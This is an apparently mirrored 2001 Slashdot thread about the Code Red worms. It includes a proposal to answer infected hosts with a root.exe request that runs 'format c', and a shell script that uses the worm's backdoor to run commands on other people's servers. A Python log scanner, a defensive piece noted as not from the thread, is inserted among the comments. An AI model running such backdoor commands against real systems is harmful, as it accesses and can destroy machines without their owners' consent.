Slashdot Mirror


Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

6 of 759 comments

  1. Re:An ETHICAL way to Anti-Virus by nitehorse · · Score: 5, Informative

    Actually, if you add a line in your httpd.conf that looks like this:

    AddHandler cgi-script .ida

    then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

    AddType application/x-httpd-php .php .php3 .ida

    Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

    -Chris

  2. Re:More information? by ncc74656 · · Score: 5, Informative
    Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

    Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

    That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

    I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

    Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

    #!/bin/sh
    http_proxy=
    # Pull the distinct source hosts that hit the CodeRed2 request id out of the web-log database
    for i in `(echo use apache2 ; echo 'select host.host from transfer inner join host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-07-31";' ) | mysql | sort | uniq | grep -v ^host\$`
    do
    echo -n Sending Code Red message to $i...
    # One ping with a 3 second deadline; skip hosts that are no longer reachable
    result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
    if [ -n "$result" ]
    then
    echo host is down.
    else
    lynx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+%22Your+web+server+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22 >/dev/null
    echo message sent.
    fi
    done

    Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

    --
    20 January 2017: the End of an Error.
  3. The Code Red hype Hall of Shame by wiredog · · Score: 5, Informative
  4. Public Logfile - for *Educational* Purposes Only by BigBlockMopar · · Score: 5, Informative

    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
    should we set up a site somewhere of ip addrs?

    Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a blithering idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

    --
    Fire and Meat. Yummy.
  5. Re:Help me out on this one... by DeadMeat+(TM) · · Score: 5, Informative
    Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

    What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

    Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there for -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it as if it were a program.

    Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.
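A defender-side companion to the mechanism described in the comment above, and to the story's question about the hundreds of IPs in an Apache log (an added example, not code from this thread): it parses constructed Apache combined-format log lines, flags default.ida probes, tells the original Code Red (N padding) from Code Red II (X padding) by the filler character, and tallies source IPs. The sample lines are constructed; the exploit bytes that follow the padding in a real request are omitted.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache combined-log format (not from the thread's logs).
# Real worm requests carry encoded shellcode after the padding; it is left out here.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Aug/2001:10:12:01 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 273
198.51.100.7 - - [04/Aug/2001:10:12:05 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 273
203.0.113.4 - - [04/Aug/2001:10:13:00 -0700] "GET /index.html HTTP/1.1" 200 1024
198.51.100.7 - - [04/Aug/2001:11:40:22 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 273
"""

# Combined log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# The worm always asks for /default.ida with a long run of one filler letter.
IDA_RE = re.compile(r'^/default\.ida\?(?P<pad>N+|X+)', re.IGNORECASE)


def classify(path):
    """Return 'CodeRed' (N padding), 'CodeRedII' (X padding) or None for ordinary paths."""
    m = IDA_RE.match(path)
    if not m:
        return None
    return 'CodeRed' if m.group('pad')[0].upper() == 'N' else 'CodeRedII'


def scan(log_text):
    """Tally default.ida probes per source IP and variant.

    On a server without the IIS indexing ISAPI (e.g. Apache) the request is harmless;
    the log entry only tells you that the *source* is infected.
    """
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        variant = classify(m.group('path'))
        if variant:
            hits[m.group('ip')][variant] += 1
    return hits


def report(hits):
    """One line per source, busiest first: '<ip>: CodeRedII=2'."""
    ordered = sorted(hits.items(), key=lambda kv: -sum(kv[1].values()))
    return [f"{ip}: " + ", ".join(f"{v}={n}" for v, n in sorted(c.items())) for ip, c in ordered]
```

Feed it a real access_log and the per-source list is what a notification or reverse-lookup script (as in the other comments) would iterate over.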

  6. I think you're on to something... by Nate+Fox · · Score: 5, Informative

    According to Symantec's page on CR2:

    Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C